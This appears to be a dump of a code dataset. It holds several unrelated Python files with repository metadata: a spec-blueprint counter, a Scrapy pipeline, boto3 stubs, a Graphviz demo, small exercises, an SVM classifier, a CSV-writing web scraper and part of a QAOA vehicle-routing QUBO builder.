blueprints = lp_nova.getSeries(name=release).valid_specifications
targeted = len(blueprints)
approved = 0
implemented = 0
unapproved_blueprint_names = set()
for blueprint in blueprints:
if blueprint.definition_status == 'Approved':
approved += 1
else:
unapproved_blueprint_names.add(blueprint.name)
if blueprint.implementation_status == 'Implemented':
implemented += 1
print('')
print('Summary')
print('-------')
print('Number of Targeted blueprints: %d' % targeted)
print('Number of Approved blueprints: %d' % approved)
print('Number of Implemented blueprints: %d' % implemented)
# Check for approved specs whose blueprints have not been approved
cwd = os.getcwd()
approved_dir = os.path.join(cwd, 'specs', release, 'approved')
approved_specs = os.listdir(approved_dir)
template_file = '%s-template.rst' % release
for spec_fname in sorted(approved_specs):
# get the blueprint name, it should be the name of the rst file
if not spec_fname.endswith('.rst'):
continue
# check for the template file and skip that
if spec_fname == template_file:
continue
bp_name = spec_fname.split('.rst')[0]
if bp_name in unapproved_blueprint_names:
print('WARNING: Blueprint for spec %s needs approval.' %
spec_fname)
def main():
opts = get_options()
count_blueprints(opts.release)
if __name__ == '__main__':
main()
| en | 0.867795 | #!/usr/bin/env python # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # Valid specifications are specifications that are not obsolete. # Check for approved specs whose blueprints have not been approved # get the blueprint name, it should be the name of the rst file # check for the template file and skip that | 2.628018 | 3 |
tests/__init__.py | ludwiglierhammer/index_calculator | 0 | 6617393 | <filename>tests/__init__.py
"""Unit test package for index_calculator."""
| <filename>tests/__init__.py
"""Unit test package for index_calculator."""
| en | 0.640701 | Unit test package for index_calculator. | 1.227488 | 1 |
scrapy_proxy_crawler/pipelines.py | DengZuoheng/scrapy_proxy_crawler | 0 | 6617394 | <reponame>DengZuoheng/scrapy_proxy_crawler<gh_stars>0
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy_proxy_crawler.items import *
class ScrapyProxyCrawlerPipeline(object):
def process_item(self, item, spider):
if isinstance(item, ProxyItem):
spider.logger.info("Accepted proxy: %s" % item['addr'])
return item | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy_proxy_crawler.items import *
class ScrapyProxyCrawlerPipeline(object):
def process_item(self, item, spider):
if isinstance(item, ProxyItem):
spider.logger.info("Accepted proxy: %s" % item['addr'])
return item | en | 0.663433 | # -*- coding: utf-8 -*- # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html | 2.042523 | 2 |
boto3_type_annotations/boto3_type_annotations/rekognition/paginator.py | cowboygneox/boto3_type_annotations | 119 | 6617395 | <filename>boto3_type_annotations/boto3_type_annotations/rekognition/paginator.py
from typing import Dict
from botocore.paginate import Paginator
class ListCollections(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
pass
class ListFaces(Paginator):
def paginate(self, CollectionId: str, PaginationConfig: Dict = None) -> Dict:
pass
class ListStreamProcessors(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
pass
| <filename>boto3_type_annotations/boto3_type_annotations/rekognition/paginator.py
from typing import Dict
from botocore.paginate import Paginator
class ListCollections(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
pass
class ListFaces(Paginator):
def paginate(self, CollectionId: str, PaginationConfig: Dict = None) -> Dict:
pass
class ListStreamProcessors(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
pass
| none | 1 | 2.204705 | 2 | |
2.py | syheliel/CyberBattleSim-1 | 0 | 6617396 | from diagrams import Diagram, Node,Edge
from diagrams.custom import Custom
shapes = [
"box","polygon","ellipse","oval","circle",
"point","egg","triangle","plaintext","plain",
"diamond","trapezium","parallelogram","house","pentagon",
"hexagon","septagon","octagon","doublecircle","doubleoctagon",
"Mdiamond","Msquare","Mcircle",
"rect","rectangle","square","star","none","underline","cylinder",
"tripleoctagon","invtriangle","invtrapezium","invhouse",
"note","tab","folder","box3d","component","promoter",
"cds","terminator","utr","primersite","restrictionsite",
"fivepoverhang","threepoverhang","noverhang","assembly",
"signature","insulator","ribosite","rnastab","proteasesite",
"proteinstab","rpromoter","rarrow","larrow","lpromoter", ]
num_shapes = len(shapes)
shapes_per_row = 5
num_of_rows = int(num_shapes / shapes_per_row) + (num_shapes % shapes_per_row > 0)
with Diagram("\n\nUsing Graphviz Shapes") as diag:
for row in range(num_of_rows)[::-1]:
items_in_row = shapes_per_row - (row+1) * shapes_per_row // num_shapes
shapes_i = row * shapes_per_row
node_list = [
'Node('
f'shape="{shapes[shapes_i+item_num]}", '
f'label="\\n"+"{shapes[shapes_i+item_num]}", '
'labelloc="t", '
'style="solid") - Edge(penwidth="0.0")'
for item_num in range(items_in_row)[:-1]
] + ['Node('
f'shape="{shapes[shapes_i+items_in_row-1]}", '
f'label="\\n"+"{shapes[shapes_i+items_in_row-1]}", '
'labelloc="t", '
'style="solid")']
node_row = "-".join(node_list)
print(len(node_list))
eval(node_row)
diag
| from diagrams import Diagram, Node,Edge
from diagrams.custom import Custom
shapes = [
"box","polygon","ellipse","oval","circle",
"point","egg","triangle","plaintext","plain",
"diamond","trapezium","parallelogram","house","pentagon",
"hexagon","septagon","octagon","doublecircle","doubleoctagon",
"Mdiamond","Msquare","Mcircle",
"rect","rectangle","square","star","none","underline","cylinder",
"tripleoctagon","invtriangle","invtrapezium","invhouse",
"note","tab","folder","box3d","component","promoter",
"cds","terminator","utr","primersite","restrictionsite",
"fivepoverhang","threepoverhang","noverhang","assembly",
"signature","insulator","ribosite","rnastab","proteasesite",
"proteinstab","rpromoter","rarrow","larrow","lpromoter", ]
num_shapes = len(shapes)
shapes_per_row = 5
num_of_rows = int(num_shapes / shapes_per_row) + (num_shapes % shapes_per_row > 0)
with Diagram("\n\nUsing Graphviz Shapes") as diag:
for row in range(num_of_rows)[::-1]:
items_in_row = shapes_per_row - (row+1) * shapes_per_row // num_shapes
shapes_i = row * shapes_per_row
node_list = [
'Node('
f'shape="{shapes[shapes_i+item_num]}", '
f'label="\\n"+"{shapes[shapes_i+item_num]}", '
'labelloc="t", '
'style="solid") - Edge(penwidth="0.0")'
for item_num in range(items_in_row)[:-1]
] + ['Node('
f'shape="{shapes[shapes_i+items_in_row-1]}", '
f'label="\\n"+"{shapes[shapes_i+items_in_row-1]}", '
'labelloc="t", '
'style="solid")']
node_row = "-".join(node_list)
print(len(node_list))
eval(node_row)
diag
| none | 1 | 3.013172 | 3 | |
rectarea.py | roshanrobotics/python-program | 0 | 6617397 | class rect():
def __init__(self,width,length):
self.width=width
self.length=length
def area(self):
return self.width*self.length
a=int(input("Enter length of rectangle: "))
b=int(input("Enter width of rectangle: "))
obj=rect(a,b)
print("Area of rectangle:",obj.area())
| class rect():
def __init__(self,width,length):
self.width=width
self.length=length
def area(self):
return self.width*self.length
a=int(input("Enter length of rectangle: "))
b=int(input("Enter width of rectangle: "))
obj=rect(a,b)
print("Area of rectangle:",obj.area())
| none | 1 | 3.949383 | 4 | |
src/lecture1/hog_svm.py | Fassial/zju-intern | 1 | 6617398 | <reponame>Fassial/zju-intern
"""
Created on July 25 01:45, 2020
@author: fassial
"""
import math
import numpy as np
from sklearn.svm import SVC
# local dep
import preprocess
class hog_svm:
def __init__(self):
self.svm = SVC(
C = 1.0
)
def train(x_train, y_train, batch_size = 100):
n_cycle = math.ceil(x_train.shape[0] / batch_size)
print("training...")
for i in range(n_cycle):
print("training..." + str(i) + "/" + str(n_cycle))
xi_train = x_train[i*batch_size:(i+1)*batch_size,:] if (i+1)*batch_size <= x_train.shape[0] else x_train[i*batch_size:,:]
yi_train = y_train[i*batch_size:(i+1)*batch_size] if (i+1)*batch_size <= y_train.shape[0] else y_train[i*batch_size:]
self.svm.fit(xi_train, yi_train)
def score(x_test, y_test, batch_size = 100):
score = 0
n_cycle = math.ceil(x_test.shape[0] / batch_size)
print("testing...")
for i in range(n_cycle):
print("testing..." + str(i) + "/" + str(n_cycle))
xi_test = x_test[i*batch_size:(i+1)*batch_size,:] if (i+1)*batch_size <= x_test.shape[0] else x_test[i*batch_size:,:]
yi_test = y_test[i*batch_size:(i+1)*batch_size] if (i+1)*batch_size <= y_test.shape[0] else y_test[i*batch_size:]
score += self.svm.score(xi_test, yi_test) * xi_test.shape[0]
score /= x_test.shape[0]
return score
if __name__ == "__main__":
hog_svm_inst = hog_svm()
x_train, y_train, x_test, y_test = preprocess.load_data()
hog_svm_inst.train(x_train, y_train)
score = hog_svm_inst.score(x_test, y_test)
print("score: " + str(score))
| """
Created on July 25 01:45, 2020
@author: fassial
"""
import math
import numpy as np
from sklearn.svm import SVC
# local dep
import preprocess
class hog_svm:
def __init__(self):
self.svm = SVC(
C = 1.0
)
def train(x_train, y_train, batch_size = 100):
n_cycle = math.ceil(x_train.shape[0] / batch_size)
print("training...")
for i in range(n_cycle):
print("training..." + str(i) + "/" + str(n_cycle))
xi_train = x_train[i*batch_size:(i+1)*batch_size,:] if (i+1)*batch_size <= x_train.shape[0] else x_train[i*batch_size:,:]
yi_train = y_train[i*batch_size:(i+1)*batch_size] if (i+1)*batch_size <= y_train.shape[0] else y_train[i*batch_size:]
self.svm.fit(xi_train, yi_train)
def score(x_test, y_test, batch_size = 100):
score = 0
n_cycle = math.ceil(x_test.shape[0] / batch_size)
print("testing...")
for i in range(n_cycle):
print("testing..." + str(i) + "/" + str(n_cycle))
xi_test = x_test[i*batch_size:(i+1)*batch_size,:] if (i+1)*batch_size <= x_test.shape[0] else x_test[i*batch_size:,:]
yi_test = y_test[i*batch_size:(i+1)*batch_size] if (i+1)*batch_size <= y_test.shape[0] else y_test[i*batch_size:]
score += self.svm.score(xi_test, yi_test) * xi_test.shape[0]
score /= x_test.shape[0]
return score
if __name__ == "__main__":
hog_svm_inst = hog_svm()
x_train, y_train, x_test, y_test = preprocess.load_data()
hog_svm_inst.train(x_train, y_train)
score = hog_svm_inst.score(x_test, y_test)
print("score: " + str(score)) | en | 0.873684 | Created on July 25 01:45, 2020 @author: fassial # local dep | 2.711082 | 3 |
986_interval_list_intersect.py | ojhaanshu87/LeetCode | 0 | 6617399 | <filename>986_interval_list_intersect.py
"""
Given two lists of closed intervals, each list of intervals is pairwise disjoint and in sorted order.
Return the intersection of these two interval lists.
(Formally, a closed interval [a, b] (with a <= b) denotes the set of real numbers x with a <= x <= b.
The intersection of two closed intervals is a set of real numbers that is either empty, or can be represented as a closed interval.
For example, the intersection of [1, 3] and [2, 4] is [2, 3].)
Input: A = [[0,2],[5,10],[13,23],[24,25]], B = [[1,5],[8,12],[15,24],[25,26]]
Output: [[1,2],[5,5],[8,10],[15,23],[24,24],[25,25]]
Note:
0 <= A.length < 1000
0 <= B.length < 1000
0 <= A[i].start, A[i].end, B[i].start, B[i].end < 10^9
"""
#ALGORITHM
#If A[0] has the smallest endpoint, it can only intersect B[0]. After, we can discard A[0] since it cannot intersect anything else.
#Similarly, if B[0] has the smallest endpoint, it can only intersect A[0], and we can discard B[0] after since it cannot intersect anything else.
#We use two pointers, i and j, to virtually manage "discarding" A[0] or B[0] repeatedly.
#Time Complexity: O(M + N)O(M+N), where M, NM,N are the lengths of A and B respectively.
#Space Complexity: O(M + N)O(M+N), the maximum size of the answer.
class Solution(object):
def intervalIntersection(self, A, B):
res, ptr_a, ptr_b = [], 0, 0
while ptr_a < len(A) and ptr_b < len(B):
start = max(A[ptr_a][0], B[ptr_b][0])
end = min(A[ptr_a][1], B[ptr_b][1])
if start <= end:
res.append([start, end])
#remove interval with smallest endpoint
if A[ptr_a][1] < B[ptr_b][1]:
ptr_a += 1
else:
ptr_b += 1
return res
| <filename>986_interval_list_intersect.py
"""
Given two lists of closed intervals, each list of intervals is pairwise disjoint and in sorted order.
Return the intersection of these two interval lists.
(Formally, a closed interval [a, b] (with a <= b) denotes the set of real numbers x with a <= x <= b.
The intersection of two closed intervals is a set of real numbers that is either empty, or can be represented as a closed interval.
For example, the intersection of [1, 3] and [2, 4] is [2, 3].)
Input: A = [[0,2],[5,10],[13,23],[24,25]], B = [[1,5],[8,12],[15,24],[25,26]]
Output: [[1,2],[5,5],[8,10],[15,23],[24,24],[25,25]]
Note:
0 <= A.length < 1000
0 <= B.length < 1000
0 <= A[i].start, A[i].end, B[i].start, B[i].end < 10^9
"""
#ALGORITHM
#If A[0] has the smallest endpoint, it can only intersect B[0]. After, we can discard A[0] since it cannot intersect anything else.
#Similarly, if B[0] has the smallest endpoint, it can only intersect A[0], and we can discard B[0] after since it cannot intersect anything else.
#We use two pointers, i and j, to virtually manage "discarding" A[0] or B[0] repeatedly.
#Time Complexity: O(M + N)O(M+N), where M, NM,N are the lengths of A and B respectively.
#Space Complexity: O(M + N)O(M+N), the maximum size of the answer.
class Solution(object):
def intervalIntersection(self, A, B):
res, ptr_a, ptr_b = [], 0, 0
while ptr_a < len(A) and ptr_b < len(B):
start = max(A[ptr_a][0], B[ptr_b][0])
end = min(A[ptr_a][1], B[ptr_b][1])
if start <= end:
res.append([start, end])
#remove interval with smallest endpoint
if A[ptr_a][1] < B[ptr_b][1]:
ptr_a += 1
else:
ptr_b += 1
return res
| en | 0.901523 | Given two lists of closed intervals, each list of intervals is pairwise disjoint and in sorted order. Return the intersection of these two interval lists. (Formally, a closed interval [a, b] (with a <= b) denotes the set of real numbers x with a <= x <= b. The intersection of two closed intervals is a set of real numbers that is either empty, or can be represented as a closed interval. For example, the intersection of [1, 3] and [2, 4] is [2, 3].) Input: A = [[0,2],[5,10],[13,23],[24,25]], B = [[1,5],[8,12],[15,24],[25,26]] Output: [[1,2],[5,5],[8,10],[15,23],[24,24],[25,25]] Note: 0 <= A.length < 1000 0 <= B.length < 1000 0 <= A[i].start, A[i].end, B[i].start, B[i].end < 10^9 #ALGORITHM #If A[0] has the smallest endpoint, it can only intersect B[0]. After, we can discard A[0] since it cannot intersect anything else. #Similarly, if B[0] has the smallest endpoint, it can only intersect A[0], and we can discard B[0] after since it cannot intersect anything else. #We use two pointers, i and j, to virtually manage "discarding" A[0] or B[0] repeatedly. #Time Complexity: O(M + N)O(M+N), where M, NM,N are the lengths of A and B respectively. #Space Complexity: O(M + N)O(M+N), the maximum size of the answer. #remove interval with smallest endpoint | 3.895559 | 4 |
chapter5/beautifulsoup_csv.py | mysodalife/spider_program | 3 | 6617400 | # -*- coding: utf-8 -*-
# @Time : 2018/10/12 11:37
# @Author : sodalife
# @File : beautifulsoup_csv.py
# @Description : csv 文件来存储
import csv
import requests
import chardet
import re
from lxml import etree
User_Agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'
headers = {'User-Agent': User_Agent}
response = requests.get('http://seputu.com', headers=headers)
response.encoding = chardet.detect(response.content)['encoding']
html = etree.HTML(response.text)
mulus = html.xpath('.//div[@class="mulu"]')
pattern = re.compile(r'\s*\[(.*)\]\s+(.*)')
rows = []
for mulu in mulus:
h2_text = mulu.xpath('.//h2/text()')
if len(h2_text) > 0:
title = h2_text[0]
print(title.encode('utf-8'))
a_s = mulu.xpath('./div[@class="box"]/ul/li/a')
for a in a_s:
href = a.xpath('./@href')[0]
box_title = a.xpath('./@title')[0]
match = re.search(pattern, box_title)
if match is not None:
date = match.group(1) # bytes 转 str
real_title = match.group(2)
content = [title, real_title, href, date]
rows.append(content)
headers = ['title', 'read_title', 'href', 'date']
with open('qiye.csv', 'w', newline='') as f:
f_csv = csv.writer(f)
f_csv.writerow(headers)
f_csv.writerows(rows)
| # -*- coding: utf-8 -*-
# @Time : 2018/10/12 11:37
# @Author : sodalife
# @File : beautifulsoup_csv.py
# @Description : csv 文件来存储
import csv
import requests
import chardet
import re
from lxml import etree
User_Agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'
headers = {'User-Agent': User_Agent}
response = requests.get('http://seputu.com', headers=headers)
response.encoding = chardet.detect(response.content)['encoding']
html = etree.HTML(response.text)
mulus = html.xpath('.//div[@class="mulu"]')
pattern = re.compile(r'\s*\[(.*)\]\s+(.*)')
rows = []
for mulu in mulus:
h2_text = mulu.xpath('.//h2/text()')
if len(h2_text) > 0:
title = h2_text[0]
print(title.encode('utf-8'))
a_s = mulu.xpath('./div[@class="box"]/ul/li/a')
for a in a_s:
href = a.xpath('./@href')[0]
box_title = a.xpath('./@title')[0]
match = re.search(pattern, box_title)
if match is not None:
date = match.group(1) # bytes 转 str
real_title = match.group(2)
content = [title, real_title, href, date]
rows.append(content)
headers = ['title', 'read_title', 'href', 'date']
with open('qiye.csv', 'w', newline='') as f:
f_csv = csv.writer(f)
f_csv.writerow(headers)
f_csv.writerows(rows)
| en | 0.262871 | # -*- coding: utf-8 -*- # @Time : 2018/10/12 11:37 # @Author : sodalife # @File : beautifulsoup_csv.py # @Description : csv 文件来存储 # bytes 转 str | 3.061314 | 3 |
qaoa_vrp/build_circuit.py | vivekkatial/HAQC | 1 | 6617401 | import base64
import uuid
from collections import defaultdict
from itertools import count
import networkx as nx
import numpy as np
from qiskit import Aer, execute
from qiskit.providers.aer import QasmSimulator
from qiskit.aqua import QuantumInstance, aqua_globals
from qiskit.aqua.algorithms import QAOA, NumPyMinimumEigensolver
from qiskit.aqua.components.optimizers import ADAM, AQGD, COBYLA, NELDER_MEAD
from qiskit.circuit import Parameter
from qiskit.finance.applications.ising import portfolio
from qiskit.optimization import QuadraticProgram
from qiskit.optimization.converters import QuadraticProgramToQubo
from qiskit.optimization.algorithms import (
MinimumEigenOptimizer,
RecursiveMinimumEigenOptimizer,
)
def build_qubos(clusters, depot_info, A=30):
"""A function to build QUBO formulations using qiskit
clusters (list): A list of `networkX` graph objects that contain the clusters (including depot)
depot_info (dict): A dictionary consisting of the depot information
A (int): A penalty (defualt is `A=30` as discussed in Feld)
Returns:
list: A list of QUBO formulations
"""
qubos = []
for subgraph in clusters:
cluster = clusters[subgraph]
constrained_qp = QuadraticProgram()
connected_elems = list(cluster.edges)
no_nodes = len(cluster.nodes)
# vars_lookup = create_vars_lookup(cluster, depot_id) Create vars_look_up for indexing
# Create binary variables for each node at each timestep
binary_vars = []
for node in cluster.nodes:
if node == depot_info["id"]: # Not including depot
continue
for i in range(no_nodes - 1): # no_timesteps = no_nodes - depot
binary_vars.append("X" + str(node) + str(i + 1))
for var in binary_vars:
constrained_qp.binary_var(var)
# Calculate constraint coefficients (linear and quadratic terms)
linear = {}
quadratic = {}
# Linear cost for travelling from depot to a node in the first and last step
for edge in connected_elems:
if edge[0] == depot_info["id"]:
# Starting node
start_var = "X" + str(edge[1]) + str(1)
linear[start_var] = cluster[edge[0]][edge[1]]["cost"]
# Last node
last_var = "X" + str(edge[1]) + str(no_nodes - 1)
linear[last_var] = cluster[edge[0]][edge[1]]["cost"]
# Allowing for having the depot as the 2nd node on the ordered edge pair (so just reversing the code above)
elif edge[1] == depot_info["id"]:
# Starting node
start_var = "X" + str(edge[0]) + str(1)
linear[start_var] = cluster[edge[0]][edge[1]]["cost"]
# Last node
last_var = "X" + str(edge[0]) + str(no_nodes - 1)
linear[last_var] = cluster[edge[0]][edge[1]]["cost"]
else: # Now quadratic cost for travelling between nodes apart from depot
for j in range(no_nodes - 2):
pairing = (
"X" + str(edge[0]) + str(j + 1),
"X" + str(edge[1]) + str(j + 2),
)
quadratic[pairing] = cluster[edge[0]][edge[1]]["cost"]
# Backwards directions
pairing = (
"X" + str(edge[1]) + str(j + 1),
"X" + str(edge[0]) + str(j + 2),
)
quadratic[pairing] = cluster[edge[0]][edge[1]]["cost"]
for node in cluster.nodes:
if node == depot_info["id"]: # Not depot
continue
# If node is not connected to the depot, increase cost when starting at that node
if (depot_info["id"], node) not in connected_elems:
var = "X" + str(node) + str(1)
if var in linear:
linear[var] += A
else:
linear[var] = A
# Likewise if the ending node is not connected to the depot
var = "X" + str(node) + str(no_nodes - 1)
if var in linear:
linear[var] += A
else:
linear[var] = A
for node2 in cluster.nodes:
if (
node2 != depot_info["id"]
and node2 != node
and (node, node2) not in cluster.edges
): # Not depot, and different node, and if the two nodes are not connected, add penalty when travelling between them
for j in range(no_nodes - 2):
# Adding cost for travelling from node to node2,
pairing = (
"X" + str(node) + str(j + 1),
"X" + str(node2) + str(j + 2),
)
if pairing in quadratic:
quadratic[pairing] += A
else:
quadratic[pairing] = A
# Reverse Direction
pairing = (
"X" + str(node2) + str(j + 1),
"X" + str(node) + str(j + 2),
)
if pairing in quadratic:
quadratic[pairing] += A
else:
quadratic[pairing] = A
# Input linear and quadratic terms for minimizing qubo objective function
constrained_qp.minimize(linear=linear, quadratic=quadratic)
# Now add constraints to make sure each node is visited exactly once:
node_constraint = {}
for r in range(no_nodes - 1):
var = "X" + str(node) + str(r + 1)
node_constraint[var] = 1
constrained_qp.linear_constraint(
linear=node_constraint,
sense="==",
rhs=1,
name="visit_node{}_once".format(node),
)
# Now add constraints to make sure each vehicle is only at one node for each timestep:
for r in range(no_nodes - 1):
timestep_constraint = {}
for node in cluster.nodes:
if node == depot_info["id"]:
continue
var = "X" + str(node) + str(r + 1)
timestep_constraint[var] = 1
constrained_qp.linear_constraint(
linear=timestep_constraint,
sense="==",
rhs=1,
name="timestep{}_one_node".format(r + 1),
)
# Convert unconstrained to QUBO
converter = QuadraticProgramToQubo(penalty=A)
qubo = converter.convert(constrained_qp)
# Append each QP to QUBO
qubos.append(qubo)
return qubos
def solve_qubo_qaoa(qubo, p, backend, points=None):
"""
Create QAOA from given qubo, and solves for both the exact value and the QAOA
Args:
qubo (object): qiskit QUBO object
p (int): the number of layers in the QAOA circuit (p value)
Returns:
exact_result (dict): the exact result of the MinimumEigenOptimizer
qaoa_result (dict): the result of running the QAOA
"""
exact_mes = NumPyMinimumEigensolver()
exact = MinimumEigenOptimizer(exact_mes)
exact_result = exact.solve(qubo)
op, offset = qubo.to_ising()
if backend == "statevector_simulator":
method = Aer.get_backend("statevector_simulator")
elif backend == "matrix_product_state":
method = QasmSimulator(method="matrix_product_state")
num_qubits = qubo.get_num_vars()
quantum_instance = QuantumInstance(
method,
shots=(2 ** np.sqrt(num_qubits)) * 2048,
seed_simulator=aqua_globals.random_seed,
seed_transpiler=aqua_globals.random_seed,
)
qaoa_meas = QAOA(
quantum_instance=quantum_instance,
p=p,
initial_point=list(2 * np.pi * np.random.random(2 * p)),
)
qaoa = MinimumEigenOptimizer(qaoa_meas)
qaoa_result = qaoa.solve(qubo)
num_qubits = qaoa.min_eigen_solver.get_optimal_circuit().num_qubits
return qaoa_result, exact_result, offset, num_qubits
def interp_point(optimal_point):
"""Method to interpolate to next point from the optimal point found from the previous layer
Args:
optimal_point (np.array): Optimal point from previous layer
Returns:
point (list): the informed next point
"""
optimal_point = list(optimal_point)
p = int(len(optimal_point) / 2)
gammas = [0] + optimal_point[0:p] + [0]
betas = [0] + optimal_point[p : 2 * p] + [0]
interp_gammas = [0] + gammas
interp_betas = [0] + betas
for i in range(1, p + 2):
interp_gammas[i] = gammas[i - 1] * (i - 1) / p + gammas[i] * (p + 1 - i) / p
interp_betas[i] = betas[i - 1] * (i - 1) / p + betas[i] * (p + 1 - i) / p
point = interp_gammas[1 : p + 2] + interp_betas[1 : p + 2]
return point
def get_fourier_points(last_expectation_value, p):
""""""
points = (
list(last_expectation_value[:p]) + [0] + list(last_expectation_value[p:]) + [0]
)
print(points)
return points
def index_to_selection(i, num_assets):
"""
Creates an index for the string value suggestion (used in print_result)
Args:
i (int): the index of the given string
num_assets (int): the number of qubits in the given index string
Returns:
x (dict): dictionary result of the given index in binary
"""
s = "{0:b}".format(i).rjust(num_assets)
x = np.array([1 if s[i] == "1" else 0 for i in reversed(range(num_assets))])
return x
def print_result(qubo, qaoa_result, num_qubits, exact_value, backend):
"""
Prints the results of the QAOA in a nice form
Args:
qubo (object): qiskit QUBO object
result (dict): the result of the QAOA
num_qubits (int): the number of qubits in the QAOA circuit
"""
if backend == "statevector_simulator":
eigenvector = (
qaoa_result.min_eigen_solver_result["eigenstate"]
if isinstance(qaoa_result.min_eigen_solver_result["eigenstate"], np.ndarray)
else qaoa_result.min_eigen_solver_result["eigenstate"].to_matrix()
)
probabilities = np.abs(eigenvector) ** 2
elif backend == "matrix_product_state":
probabilities = []
for eigenstate in qaoa_result.min_eigen_solver_result["eigenstate"]:
probabilities.append(
qaoa_result.min_eigen_solver_result["eigenstate"][eigenstate] / 1024
)
i_sorted = reversed(np.argsort(probabilities))
print("----------------- Full result ---------------------")
print("index\tselection\t\tvalue\t\tprobability")
print("---------------------------------------------------")
exact_probs = []
solution_data = {}
for index, i in enumerate(i_sorted):
x = index_to_selection(i, num_qubits)
probability = probabilities[i]
if index == 0 or index == 1:
print(
"%d\t%10s\t%.4f\t\t%.4f"
% (index, x, qubo.objective.evaluate(x), probability)
)
if qubo.objective.evaluate(x) == exact_value:
print(
"%d\t%10s\t%.4f\t\t%.4f"
% (index, x, qubo.objective.evaluate(x), probability)
)
exact_probs.append(probability)
solution_data[f"{x}"] = {
"index": index,
"energy": qubo.objective.evaluate(x),
"probability": probability,
}
print("\n")
return exact_probs, solution_data
def assign_parameters(circuit, params_expr, params):
"""
Args:
circuit ([type]): [description]
params_expr ([type]): [description]
params ([type]): [description]
Returns:
[type]: [description]
"""
# Assign params_expr -> params
circuit2 = circuit.assign_parameters(
{params_expr[i]: params[i] for i in range(len(params))}, inplace=False
)
return circuit2
def to_hamiltonian_dicts(quadratic_program: QuadraticProgram):
"""
Converts a Qiskit QuadraticProgram for QAOA to pair of dictionaries representing the
Hamiltonian. Based on qiskit.optimization.QuadraticProgram.to_ising.
Args:
quadratic_program (QuadraticProgram): Qiskit QuadraticProgram representing a
QAOA problem
Returns:
num_nodes (int): Integer number of qubits
linear_terms (defaultdict[int, float]): Coefficients of Z_i terms in the
Hamiltonian.
quadratic_terms (defaultdict[Tuple[int, int], float]): Coefficients of Z_i Z_j
terms in the Hamiltonian
"""
# if problem has variables that are not binary, raise an error
if quadratic_program.get_num_vars() > quadratic_program.get_num_binary_vars():
raise ValueError(
"The type of variable must be a binary variable. "
"Use a QuadraticProgramToQubo converter to convert "
"integer variables to binary variables. "
"If the problem contains continuous variables, "
"currently we can not apply VQE/QAOA directly. "
"you might want to use an ADMM optimizer "
"for the problem. "
)
# if constraints exist, raise an error
if quadratic_program.linear_constraints or quadratic_program.quadratic_constraints:
raise ValueError(
"An constraint exists. "
"The method supports only model with no constraints. "
"Use a QuadraticProgramToQubo converter. "
"It converts inequality constraints to equality "
"constraints, and then, it converters equality "
"constraints to penalty terms of the object function."
)
# initialize Hamiltonian.
num_nodes = quadratic_program.get_num_vars()
linear_terms = defaultdict(float)
quadratic_terms = defaultdict(float)
# set a sign corresponding to a maximized or minimized problem.
# sign == 1 is for minimized problem. sign == -1 is for maximized problem.
sense = quadratic_program.objective.sense.value
# convert linear parts of the object function into Hamiltonian.
for i, coeff in quadratic_program.objective.linear.to_dict().items():
linear_terms[i] -= sense * coeff / 2
# create Pauli terms
for pair, coeff in quadratic_program.objective.quadratic.to_dict().items():
weight = sense * coeff / 4
i, j = sorted(pair)
if i != j:
quadratic_terms[i, j] += weight
linear_terms[i] -= weight
linear_terms[j] -= weight
return num_nodes, linear_terms, quadratic_terms
| import base64
import uuid
from collections import defaultdict
from itertools import count
import networkx as nx
import numpy as np
from qiskit import Aer, execute
from qiskit.providers.aer import QasmSimulator
from qiskit.aqua import QuantumInstance, aqua_globals
from qiskit.aqua.algorithms import QAOA, NumPyMinimumEigensolver
from qiskit.aqua.components.optimizers import ADAM, AQGD, COBYLA, NELDER_MEAD
from qiskit.circuit import Parameter
from qiskit.finance.applications.ising import portfolio
from qiskit.optimization import QuadraticProgram
from qiskit.optimization.converters import QuadraticProgramToQubo
from qiskit.optimization.algorithms import (
MinimumEigenOptimizer,
RecursiveMinimumEigenOptimizer,
)
def build_qubos(clusters, depot_info, A=30):
"""A function to build QUBO formulations using qiskit
clusters (list): A list of `networkX` graph objects that contain the clusters (including depot)
depot_info (dict): A dictionary consisting of the depot information
A (int): A penalty (defualt is `A=30` as discussed in Feld)
Returns:
list: A list of QUBO formulations
"""
qubos = []
for subgraph in clusters:
cluster = clusters[subgraph]
constrained_qp = QuadraticProgram()
connected_elems = list(cluster.edges)
no_nodes = len(cluster.nodes)
# vars_lookup = create_vars_lookup(cluster, depot_id) Create vars_look_up for indexing
# Create binary variables for each node at each timestep
binary_vars = []
for node in cluster.nodes:
if node == depot_info["id"]: # Not including depot
continue
for i in range(no_nodes - 1): # no_timesteps = no_nodes - depot
binary_vars.append("X" + str(node) + str(i + 1))
for var in binary_vars:
constrained_qp.binary_var(var)
# Calculate constraint coefficients (linear and quadratic terms)
linear = {}
quadratic = {}
# Linear cost for travelling from depot to a node in the first and last step
for edge in connected_elems:
if edge[0] == depot_info["id"]:
# Starting node
start_var = "X" + str(edge[1]) + str(1)
linear[start_var] = cluster[edge[0]][edge[1]]["cost"]
# Last node
last_var = "X" + str(edge[1]) + str(no_nodes - 1)
linear[last_var] = cluster[edge[0]][edge[1]]["cost"]
# Allowing for having the depot as the 2nd node on the ordered edge pair (so just reversing the code above)
elif edge[1] == depot_info["id"]:
# Starting node
start_var = "X" + str(edge[0]) + str(1)
